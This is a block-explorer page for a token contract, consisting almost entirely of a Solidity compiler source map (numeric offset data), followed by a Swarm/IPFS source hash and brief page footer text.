;697:32;;;;;;;;;;;;;;;;:40;;;;;;;;;;;;;;;;;;674:3;;;;;:::i;:::-;;;;629:123;;;;599:492;;;781:1;772:5;:10;;;768:323;;;803:9;798:118;822:12;;:19;;818:1;:23;798:118;;;897:4;866:11;:28;878:12;;891:1;878:15;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;866:28;;;;;;;;;;;;;;;;:35;;;;;;;;;;;;;;;;;;843:3;;;;;:::i;:::-;;;;798:118;;;;768:323;;;945:1;936:5;:10;;;932:159;;;967:9;962:119;986:12;;:19;;982:1;:23;962:119;;;1061:5;1030:11;:28;1042:12;;1055:1;1042:15;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;1030:28;;;;;;;;;;;;;;;;:36;;;;;;;;;;;;;;;;;;1007:3;;;;;:::i;:::-;;;;962:119;;;;932:159;768:323;599:492;431:660;303:794;;;:::o;4095:317:0:-;4201:4;4217:36;4227:6;4235:9;4246:6;4217:9;:36::i;:::-;4263:121;4272:6;4280:12;:10;:12::i;:::-;4294:89;4332:6;4294:89;;;;;;;;;;;;;;;;;:11;:19;4306:6;4294:19;;;;;;;;;;;;;;;:33;4314:12;:10;:12::i;:::-;4294:33;;;;;;;;;;;;;;;;:37;;:89;;;;;:::i;:::-;4263:8;:121::i;:::-;4401:4;4394:11;;4095:317;;;;;:::o;2214:89::-;2263:5;2287:9;;;;;;;;;;;2280:16;;2214:89;:::o;5555:215::-;5643:4;5659:83;5668:12;:10;:12::i;:::-;5682:7;5691:50;5730:10;5691:11;:25;5703:12;:10;:12::i;:::-;5691:25;;;;;;;;;;;;;;;:34;5717:7;5691:34;;;;;;;;;;;;;;;;:38;;:50;;;;:::i;:::-;5659:8;:83::i;:::-;5759:4;5752:11;;5555:215;;;;:::o;228:69:1:-;267:27;273:12;:10;:12::i;:::-;287:6;267:5;:27::i;:::-;228:69;:::o;2426:125:0:-;2500:7;2526:9;:18;2536:7;2526:18;;;;;;;;;;;;;;;;2519:25;;2426:125;;;:::o;2115:93::-;2162:13;2194:7;2187:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;2115:93;:::o;4899:266::-;4992:4;5008:129;5017:12;:10;:12::i;:::-;5031:7;5040:96;5079:15;5040:96;;;;;;;;;;;;;;;;;:11;:25;5052:12;:10;:12::i;:::-;5040:25;;;;;;;;;;;;;;;:34;5066:7;5040:34;;;;;;;;;;;;;;;;:38;;:96;;;;;:::i;:::-;5008:8;:129::i;:::-;5154:4;5147:11;;4899:266;;;;:::o;3456:172::-;3542:4;3558:42;3568:12;:10;:12::i;:::-;3582:9;3593:6;3558:9;:42::i;:::-;3617:4;3610:11;;3456:172;;;;:::o;1221:119:1:-;1284:4;1307:15;:26;1323:9;1307:26;;;;;;;;;;;;;;;;;;;;;;;;;1300:33;;1221:119;;;:::o;1103:112::-;1163:4;1186:11;:22;1198:9;1186:22;;;;;;;;;;;;;;;;;;;;;;;;;1179:29;;1103:112;;;:::o;3104:149:0:-;3193:7;3219:11;:18;3231:5;3219:18;;;;;;;;;;;;;;;:27;3238:7;3219:27;;;;;;;;;;;;;;;;3212:34;;3104:149;;;;:::o;2349:240:4:-;1970:12;:10;:12::i;:::-;1959:23;;:7;:5;:7::i;:::-;:23;;;1951:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;2457:1:::1;2437:22;;:8;:22;;;;2429:73;;;;;;;;;;;;:::i;:::-;;;;;;;;;2546:8;2517:38;;2538:6;::::0;::::1;;;;;;;;2517:38;;;;;;;;;;;;2574:8;2565:6;::::0;:17:::1;;;;;;;;;;;;;;;;;;2349:240:::0;:::o;2381:175:3:-;2439:7;2458:9;2474:1;2470;:5;;;;:::i;:::-;2458:17;;2498:1;2493;:6;;2485:46;;;;;;;;;;;;:::i;:::-;;;;;;;;;2548:1;2541:8;;;2381:175;;;;:::o;590:97:4:-;643:7;670:10;663:17;;590:97;:::o;8868:340:0:-;8986:1;8969:19;;:5;:19;;;;8961:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;9066:1;9047:21;;:7;:21;;;;9039:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;9148:6;9118:11;:18;9130:5;9118:18;;;;;;;;;;;;;;;:27;9137:7;9118:27;;;;;;;;;;;;;;;:36;;;;9185:7;9169:32;;9178:5;9169:32;;;9194:6;9169:32;;;;;;:::i;:::-;;;;;;;;8868:340;;;:::o;2113:87:4:-;2161:7;2187:6;;;;;;;;;;;2180:13;;2113:87;:::o;6244:603:0:-;6367:1;6349:20;;:6;:20;;;;6341:70;;;;;;;;;;;;:::i;:::-;;;;;;;;;6450:1;6429:23;;:9;:23;;;;6421:71;;;;;;;;;;;;:::i;:::-;;;;;;;;;6502:15;6520:47;6541:6;6549:9;6560:6;6520:20;:47::i;:::-;6502:65;;6597:71;6619:6;6597:71;;;;;;;;;;;;;;;;;:9;:17;6607:6;6597:17;;;;;;;;;;;;;;;;:21;;:71;;;;;:::i;:::-;6577:9;:17;6587:6;6577:17;;;;;;;;;;;;;;;:91;;;;6701:33;6726:7;6701:9;:20;6711:9;6701:20;;;;;;;;;;;;;;;;:24;;:33;;;;:::i;:::-;6678:9;:20;6688:9;6678:20;;;;;;;;;;;;;;;:56;;;;6744:46;6764:6;6772:9;6783:6;6744:19;:46::i;:::-;6822:9;6805:35;;6814:6;6805:35;;;6833:6;6805:35;;;;;;:::i;:::-;;;;;;;;6244:603;;;;:::o;4321:163:3:-;4407:7;4439:1;4434;:6;;4442:12;4426:29;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;4476:1;4472;:5;;;;:::i;:::-;4465:12;;4321:163;;;;;:::o;7167:349:0:-;7269:1;7250:21;;:7;:21;;;;7242:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;7340:68;7363:6;7340:68;;;;;;;;;;;;;;;;;:9;:18;7350:7;7340:18;;;;;;;;;;;;;;;;:22;;:68;;;;;:::i;:::-;7319:9;:18;7329:7;7319:18;;;;;;;;;;;;;;;:89;;;;7433:24;7450:6;7433:12;;:16;;:24;;;;:::i;:::-;7418:12;:39;;;;7498:1;7472:37;;7481:7;7472:37;;;7502:6;7472:37;;;;;;:::i;:::-;;;;;;;;7167:349;;:::o;10683:259::-;10777:7;10801:11;:17;10813:4;10801:17;;;;;;;;;;;;;;;;;;;;;;;;;:36;;;;10822:11;:15;10834:2;10822:15;;;;;;;;;;;;;;;;;;;;;;;;;10801:36;10797:139;;;10860:21;10874:6;10860:13;:21::i;:::-;10853:28;;;;10797:139;10919:6;10912:13;;10683:259;;;;;;:::o;9796:203::-;9918:15;:19;9934:2;9918:19;;;;;;;;;;;;;;;;;;;;;;;;;9914:79;;;9962:5;9940:15;:19;9956:2;9940:19;;;;;;;;;;;;;;;;:27;;;;;;;;;;;;;;;;;;9987:4;9969:11;:15;9981:2;9969:15;;;;;;;;;;;;;;;;:22;;;;;;;;;;;;;;;;;;9914:79;9796:203;;;:::o;2820:155:3:-;2878:7;2910:1;2905;:6;;2897:49;;;;;;;;;;;;:::i;:::-;;;;;;;;;2967:1;2963;:5;;;;:::i;:::-;2956:12;;2820:155;;;;:::o;10005:92:0:-;10061:7;10089:6;10082:4;10078:1;:8;;;;:::i;:::-;:17;;;;:::i;:::-;10071:24;;10005:92;;;:::o;7:139:5:-;;91:6;78:20;69:29;;107:33;134:5;107:33;:::i;:::-;59:87;;;;:::o;169:367::-;;;302:3;295:4;287:6;283:17;279:27;269:2;;320:1;317;310:12;269:2;356:6;343:20;333:30;;386:18;378:6;375:30;372:2;;;418:1;415;408:12;372:2;455:4;447:6;443:17;431:29;;509:3;501:4;493:6;489:17;479:8;475:32;472:41;469:2;;;526:1;523;516:12;469:2;259:277;;;;;:::o;542:139::-;;626:6;613:20;604:29;;642:33;669:5;642:33;:::i;:::-;594:87;;;;:::o;687:135::-;;769:6;756:20;747:29;;785:31;810:5;785:31;:::i;:::-;737:85;;;;:::o;828:262::-;;936:2;924:9;915:7;911:23;907:32;904:2;;;952:1;949;942:12;904:2;995:1;1020:53;1065:7;1056:6;1045:9;1041:22;1020:53;:::i;:::-;1010:63;;966:117;894:196;;;;:::o;1096:407::-;;;1221:2;1209:9;1200:7;1196:23;1192:32;1189:2;;;1237:1;1234;1227:12;1189:2;1280:1;1305:53;1350:7;1341:6;1330:9;1326:22;1305:53;:::i;:::-;1295:63;;1251:117;1407:2;1433:53;1478:7;1469:6;1458:9;1454:22;1433:53;:::i;:::-;1423:63;;1378:118;1179:324;;;;;:::o;1509:552::-;;;;1651:2;1639:9;1630:7;1626:23;1622:32;1619:2;;;1667:1;1664;1657:12;1619:2;1710:1;1735:53;1780:7;1771:6;1760:9;1756:22;1735:53;:::i;:::-;1725:63;;1681:117;1837:2;1863:53;1908:7;1899:6;1888:9;1884:22;1863:53;:::i;:::-;1853:63;;1808:118;1965:2;1991:53;2036:7;2027:6;2016:9;2012:22;1991:53;:::i;:::-;1981:63;;1936:118;1609:452;;;;;:::o;2067:407::-;;;2192:2;2180:9;2171:7;2167:23;2163:32;2160:2;;;2208:1;2205;2198:12;2160:2;2251:1;2276:53;2321:7;2312:6;2301:9;2297:22;2276:53;:::i;:::-;2266:63;;2222:117;2378:2;2404:53;2449:7;2440:6;2429:9;2425:22;2404:53;:::i;:::-;2394:63;;2349:118;2150:324;;;;;:::o;2480:262::-;;2588:2;2576:9;2567:7;2563:23;2559:32;2556:2;;;2604:1;2601;2594:12;2556:2;2647:1;2672:53;2717:7;2708:6;2697:9;2693:22;2672:53;:::i;:::-;2662:63;;2618:117;2546:196;;;;:::o;2748:566::-;;;;2906:2;2894:9;2885:7;2881:23;2877:32;2874:2;;;2922:1;2919;2912:12;2874:2;2965:1;2990:51;3033:7;3024:6;3013:9;3009:22;2990:51;:::i;:::-;2980:61;;2936:115;3118:2;3107:9;3103:18;3090:32;3149:18;3141:6;3138:30;3135:2;;;3181:1;3178;3171:12;3135:2;3217:80;3289:7;3280:6;3269:9;3265:22;3217:80;:::i;:::-;3199:98;;;;3061:246;2864:450;;;;;:::o;3320:109::-;3401:21;3416:5;3401:21;:::i;:::-;3396:3;3389:34;3379:50;;:::o;3435:364::-;;3551:39;3584:5;3551:39;:::i;:::-;3606:71;3670:6;3665:3;3606:71;:::i;:::-;3599:78;;3686:52;3731:6;3726:3;3719:4;3712:5;3708:16;3686:52;:::i;:::-;3763:29;3785:6;3763:29;:::i;:::-;3758:3;3754:39;3747:46;;3527:272;;;;;:::o;3805:366::-;;3968:67;4032:2;4027:3;3968:67;:::i;:::-;3961:74;;4044:93;4133:3;4044:93;:::i;:::-;4162:2;4157:3;4153:12;4146:19;;3951:220;;;:::o;4177:366::-;;4340:67;4404:2;4399:3;4340:67;:::i;:::-;4333:74;;4416:93;4505:3;4416:93;:::i;:::-;4534:2;4529:3;4525:12;4518:19;;4323:220;;;:::o;4549:366::-;;4712:67;4776:2;4771:3;4712:67;:::i;:::-;4705:74;;4788:93;4877:3;4788:93;:::i;:::-;4906:2;4901:3;4897:12;4890:19;;4695:220;;;:::o;4921:366::-;;5084:67;5148:2;5143:3;5084:67;:::i;:::-;5077:74;;5160:93;5249:3;5160:93;:::i;:::-;5278:2;5273:3;5269:12;5262:19;;5067:220;;;:::o;5293:366::-;;5456:67;5520:2;5515:3;5456:67;:::i;:::-;5449:74;;5532:93;5621:3;5532:93;:::i;:::-;5650:2;5645:3;5641:12;5634:19;;5439:220;;;:::o;5665:366::-;;5828:67;5892:2;5887:3;5828:67;:::i;:::-;5821:74;;5904:93;5993:3;5904:93;:::i;:::-;6022:2;6017:3;6013:12;6006:19;;5811:220;;;:::o;6037:366::-;;6200:67;6264:2;6259:3;6200:67;:::i;:::-;6193:74;;6276:93;6365:3;6276:93;:::i;:::-;6394:2;6389:3;6385:12;6378:19;;6183:220;;;:::o;6409:366::-;;6572:67;6636:2;6631:3;6572:67;:::i;:::-;6565:74;;6648:93;6737:3;6648:93;:::i;:::-;6766:2;6761:3;6757:12;6750:19;;6555:220;;;:::o;6781:366::-;;6944:67;7008:2;7003:3;6944:67;:::i;:::-;6937:74;;7020:93;7109:3;7020:93;:::i;:::-;7138:2;7133:3;7129:12;7122:19;;6927:220;;;:::o;7153:118::-;7240:24;7258:5;7240:24;:::i;:::-;7235:3;7228:37;7218:53;;:::o;7277:112::-;7360:22;7376:5;7360:22;:::i;:::-;7355:3;7348:35;7338:51;;:::o;7395:210::-;;7520:2;7509:9;7505:18;7497:26;;7533:65;7595:1;7584:9;7580:17;7571:6;7533:65;:::i;:::-;7487:118;;;;:::o;7611:313::-;;7762:2;7751:9;7747:18;7739:26;;7811:9;7805:4;7801:20;7797:1;7786:9;7782:17;7775:47;7839:78;7912:4;7903:6;7839:78;:::i;:::-;7831:86;;7729:195;;;;:::o;7930:419::-;;8134:2;8123:9;8119:18;8111:26;;8183:9;8177:4;8173:20;8169:1;8158:9;8154:17;8147:47;8211:131;8337:4;8211:131;:::i;:::-;8203:139;;8101:248;;;:::o;8355:419::-;;8559:2;8548:9;8544:18;8536:26;;8608:9;8602:4;8598:20;8594:1;8583:9;8579:17;8572:47;8636:131;8762:4;8636:131;:::i;:::-;8628:139;;8526:248;;;:::o;8780:419::-;;8984:2;8973:9;8969:18;8961:26;;9033:9;9027:4;9023:20;9019:1;9008:9;9004:17;8997:47;9061:131;9187:4;9061:131;:::i;:::-;9053:139;;8951:248;;;:::o;9205:419::-;;9409:2;9398:9;9394:18;9386:26;;9458:9;9452:4;9448:20;9444:1;9433:9;9429:17;9422:47;9486:131;9612:4;9486:131;:::i;:::-;9478:139;;9376:248;;;:::o;9630:419::-;;9834:2;9823:9;9819:18;9811:26;;9883:9;9877:4;9873:20;9869:1;9858:9;9854:17;9847:47;9911:131;10037:4;9911:131;:::i;:::-;9903:139;;9801:248;;;:::o;10055:419::-;;10259:2;10248:9;10244:18;10236:26;;10308:9;10302:4;10298:20;10294:1;10283:9;10279:17;10272:47;10336:131;10462:4;10336:131;:::i;:::-;10328:139;;10226:248;;;:::o;10480:419::-;;10684:2;10673:9;10669:18;10661:26;;10733:9;10727:4;10723:20;10719:1;10708:9;10704:17;10697:47;10761:131;10887:4;10761:131;:::i;:::-;10753:139;;10651:248;;;:::o;10905:419::-;;11109:2;11098:9;11094:18;11086:26;;11158:9;11152:4;11148:20;11144:1;11133:9;11129:17;11122:47;11186:131;11312:4;11186:131;:::i;:::-;11178:139;;11076:248;;;:::o;11330:419::-;;11534:2;11523:9;11519:18;11511:26;;11583:9;11577:4;11573:20;11569:1;11558:9;11554:17;11547:47;11611:131;11737:4;11611:131;:::i;:::-;11603:139;;11501:248;;;:::o;11755:222::-;;11886:2;11875:9;11871:18;11863:26;;11899:71;11967:1;11956:9;11952:17;11943:6;11899:71;:::i;:::-;11853:124;;;;:::o;11983:214::-;;12110:2;12099:9;12095:18;12087:26;;12123:67;12187:1;12176:9;12172:17;12163:6;12123:67;:::i;:::-;12077:120;;;;:::o;12203:99::-;;12289:5;12283:12;12273:22;;12262:40;;;:::o;12308:169::-;;12426:6;12421:3;12414:19;12466:4;12461:3;12457:14;12442:29;;12404:73;;;;:::o;12483:305::-;;12542:20;12560:1;12542:20;:::i;:::-;12537:25;;12576:20;12594:1;12576:20;:::i;:::-;12571:25;;12730:1;12662:66;12658:74;12655:1;12652:81;12649:2;;;12736:18;;:::i;:::-;12649:2;12780:1;12777;12773:9;12766:16;;12527:261;;;;:::o;12794:185::-;;12851:20;12869:1;12851:20;:::i;:::-;12846:25;;12885:20;12903:1;12885:20;:::i;:::-;12880:25;;12924:1;12914:2;;12929:18;;:::i;:::-;12914:2;12971:1;12968;12964:9;12959:14;;12836:143;;;;:::o;12985:348::-;;13048:20;13066:1;13048:20;:::i;:::-;13043:25;;13082:20;13100:1;13082:20;:::i;:::-;13077:25;;13270:1;13202:66;13198:74;13195:1;13192:81;13187:1;13180:9;13173:17;13169:105;13166:2;;;13277:18;;:::i;:::-;13166:2;13325:1;13322;13318:9;13307:20;;13033:300;;;;:::o;13339:191::-;;13399:20;13417:1;13399:20;:::i;:::-;13394:25;;13433:20;13451:1;13433:20;:::i;:::-;13428:25;;13472:1;13469;13466:8;13463:2;;;13477:18;;:::i;:::-;13463:2;13522:1;13519;13515:9;13507:17;;13384:146;;;;:::o;13536:96::-;;13602:24;13620:5;13602:24;:::i;:::-;13591:35;;13581:51;;;:::o;13638:90::-;;13715:5;13708:13;13701:21;13690:32;;13680:48;;;:::o;13734:126::-;;13811:42;13804:5;13800:54;13789:65;;13779:81;;;:::o;13866:77::-;;13932:5;13921:16;;13911:32;;;:::o;13949:86::-;;14024:4;14017:5;14013:16;14002:27;;13992:43;;;:::o;14041:307::-;14109:1;14119:113;14133:6;14130:1;14127:13;14119:113;;;14218:1;14213:3;14209:11;14203:18;14199:1;14194:3;14190:11;14183:39;14155:2;14152:1;14148:10;14143:15;;14119:113;;;14250:6;14247:1;14244:13;14241:2;;;14330:1;14321:6;14316:3;14312:16;14305:27;14241:2;14090:258;;;;:::o;14354:320::-;;14435:1;14429:4;14425:12;14415:22;;14482:1;14476:4;14472:12;14503:18;14493:2;;14559:4;14551:6;14547:17;14537:27;;14493:2;14621;14613:6;14610:14;14590:18;14587:38;14584:2;;;14640:18;;:::i;:::-;14584:2;14405:269;;;;:::o;14680:233::-;;14742:24;14760:5;14742:24;:::i;:::-;14733:33;;14788:66;14781:5;14778:77;14775:2;;;14858:18;;:::i;:::-;14775:2;14905:1;14898:5;14894:13;14887:20;;14723:190;;;:::o;14919:180::-;14967:77;14964:1;14957:88;15064:4;15061:1;15054:15;15088:4;15085:1;15078:15;15105:180;15153:77;15150:1;15143:88;15250:4;15247:1;15240:15;15274:4;15271:1;15264:15;15291:180;15339:77;15336:1;15329:88;15436:4;15433:1;15426:15;15460:4;15457:1;15450:15;15477:102;;15569:2;15565:7;15560:2;15553:5;15549:14;15545:28;15535:38;;15525:54;;;:::o;15585:222::-;15725:34;15721:1;15713:6;15709:14;15702:58;15794:5;15789:2;15781:6;15777:15;15770:30;15691:116;:::o;15813:225::-;15953:34;15949:1;15941:6;15937:14;15930:58;16022:8;16017:2;16009:6;16005:15;15998:33;15919:119;:::o;16044:221::-;16184:34;16180:1;16172:6;16168:14;16161:58;16253:4;16248:2;16240:6;16236:15;16229:29;16150:115;:::o;16271:177::-;16411:29;16407:1;16399:6;16395:14;16388:53;16377:71;:::o;16454:180::-;16594:32;16590:1;16582:6;16578:14;16571:56;16560:74;:::o;16640:182::-;16780:34;16776:1;16768:6;16764:14;16757:58;16746:76;:::o;16828:220::-;16968:34;16964:1;16956:6;16952:14;16945:58;17037:3;17032:2;17024:6;17020:15;17013:28;16934:114;:::o;17054:224::-;17194:34;17190:1;17182:6;17178:14;17171:58;17263:7;17258:2;17250:6;17246:15;17239:32;17160:118;:::o;17284:223::-;17424:34;17420:1;17412:6;17408:14;17401:58;17493:6;17488:2;17480:6;17476:15;17469:31;17390:117;:::o;17513:122::-;17586:24;17604:5;17586:24;:::i;:::-;17579:5;17576:35;17566:2;;17625:1;17622;17615:12;17566:2;17556:79;:::o;17641:122::-;17714:24;17732:5;17714:24;:::i;:::-;17707:5;17704:35;17694:2;;17753:1;17750;17743:12;17694:2;17684:79;:::o;17769:118::-;17840:22;17856:5;17840:22;:::i;:::-;17833:5;17830:33;17820:2;;17877:1;17874;17867:12;17820:2;17810:77;:::o

Swarm Source

ipfs://b539f680720a75801b68b8c2ee2cb10ef3da98e93c40a178e663aa764f8fb093
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.